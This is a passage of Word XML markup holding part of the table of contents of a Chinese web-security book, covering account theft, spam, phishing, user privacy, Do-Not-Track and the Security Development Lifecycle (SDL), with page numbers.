    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>账户被盗的途径</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>374</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>分析账户被盗的原因</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>376</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>互联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的垃圾</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>377</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>垃圾的危害</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>377</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>垃圾处理</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>379</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="57" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>络钓鱼</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>380</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>钓鱼网站简介</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>381</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>邮件钓鱼</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>383</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>钓鱼网站的防控</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>385</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>网购流程钓鱼</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>388</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>隐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>私保护</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>393</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>互联网的用户隐私挑战</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>393</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>如何保护用户隐私</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>394</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="103" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Do-Not-Track</w:t>
        <w:tab/>
        <w:t>396</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="59"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>16.7</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>397</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="179"/>
        <w:ind w:left="954" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（附</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>麻烦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>终结者</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>398</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1630" w:val="left" w:leader="none"/>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="673" w:after="0"/>
        <w:ind w:left="1630" w:right="0" w:hanging="599"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:10.889985pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2272" coordorigin="254,218" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:217;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1317;top:239;width:7139;height:283" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7118" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="282" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>安全</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>开</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>发</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>流程</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>（</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>SDL</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>）</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>402</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:285;width:810;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="1"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>17</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-33"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>简介</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>402</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="55" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>敏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>捷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-33"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SDL</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>406</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1630" w:val="left" w:leader="none"/>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1630" w:right="0" w:hanging="599"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>实战</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>经</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>验</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>407</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>需求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>析与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
